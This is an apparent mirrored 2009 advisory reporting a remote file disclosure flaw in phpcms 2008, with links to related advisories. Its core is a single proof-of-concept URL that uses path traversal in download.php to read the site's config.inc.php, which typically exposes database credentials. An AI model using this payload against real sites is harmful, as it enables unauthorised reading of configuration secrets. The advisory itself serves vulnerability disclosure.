Security Advisory: phpcms 2008 Remote File Disclosure Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [SECURITY] [DSA 1913-1] New bugzilla packages fix SQL injection
  [ONSEC-09-018] Twilight CMS XSS
  [ONSEC-09-004] Amiro.CMS Multiple XSS
  [ONSEC-09-005] Amiro.CMS root folder disclosure

From: info_(at)_securitylab.ir <info_(at)_securitylab.ir>
Date: 19.10.2009
Subject: phpcms 2008 Remote File Disclosure Vulnerability

########################## Securitylab.ir ########################
# Application Info:
# Name: phpcms 2008
# Version: All
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Remote File Disclosure Vulnerability
# Risk: Medium
#===========================================================
# http://site.com/[path]/download.php?a_k=Jh5zIw==&i=20&m=2&f=..
/include/config.inc.php&t=2233577313&ip=127.0.0.1&s=m/&d=1
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

test server